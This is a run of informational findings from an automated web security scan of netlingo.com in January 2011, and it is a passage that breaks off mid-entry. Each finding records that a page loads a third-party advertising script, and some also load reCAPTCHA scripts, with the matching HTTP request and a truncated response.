Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/subscribe.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /subscribe.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 33520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1176. http://www.netlingo.com/tips/color-guide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tips/color-guide.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tips/color-guide.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 51430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1177. http://www.netlingo.com/tips/cyber-safety-statistics.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tips/cyber-safety-statistics.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tips/cyber-safety-statistics.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 38306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1178. http://www.netlingo.com/tips/file-extensions.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tips/file-extensions.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tips/file-extensions.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 49172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1179. http://www.netlingo.com/tips/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tips/index.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tips/index.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1180. http://www.netlingo.com/tips/resources.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tips/resources.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tips/resources.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 73582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1181. http://www.netlingo.com/tips/webcasts.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tips/webcasts.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tips/webcasts.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1182. http://www.netlingo.com/tools/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tools/index.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tools/index.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 35134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1183. http://www.netlingo.com/tools/online-store.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tools/online-store.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tools/online-store.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 31802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1184. http://www.netlingo.com/tools/pocket-dictionary.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tools/pocket-dictionary.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tools/pocket-dictionary.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1185. http://www.netlingo.com/tools/search-browse-box.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tools/search-browse-box.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tools/search-browse-box.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 39710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1186. http://www.netlingo.com/tools/toolbar.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tools/toolbar.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tools/toolbar.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 33818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1187. http://www.netlingo.com/tools/widget.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tools/widget.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tools/widget.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1188. http://www.netlingo.com/tools/wotd.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tools/wotd.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tools/wotd.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1189. http://www.netlingo.com/top50/acronyms-for-parents.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/top50/acronyms-for-parents.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /top50/acronyms-for-parents.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1190. http://www.netlingo.com/top50/business-text-terms.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/top50/business-text-terms.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /top50/business-text-terms.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1191. http://www.netlingo.com/top50/common-expressions.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/top50/common-expressions.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /top50/common-expressions.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41459

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1192. http://www.netlingo.com/top50/funniest-terms.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/top50/funniest-terms.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /top50/funniest-terms.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1193. http://www.netlingo.com/top50/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/top50/index.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /top50/index.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1194. http://www.netlingo.com/top50/newbie-terms.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/top50/newbie-terms.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /top50/newbie-terms.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1195. http://www.netlingo.com/top50/popular-text-terms.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/top50/popular-text-terms.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /top50/popular-text-terms.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1196. http://www.netlingo.com/unsubscribe.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/unsubscribe.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /unsubscribe.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1197. http://www.netlingo.com/word-of-the-day/aotd.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/word-of-the-day/aotd.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word-of-the-day/aotd.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1198. http://www.netlingo.com/word-of-the-day/business.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/word-of-the-day/business.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word-of-the-day/business.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1199. http://www.netlingo.com/word-of-the-day/feeds.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/word-of-the-day/feeds.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word-of-the-day/feeds.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:44:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 38212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1200. http://www.netlingo.com/word-of-the-day/jargon.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/word-of-the-day/jargon.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word-of-the-day/jargon.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41281

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1201. http://www.netlingo.com/word-of-the-day/technical.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/word-of-the-day/technical.php

Issue detail

The response dynamically includes the following scripts from other domains:

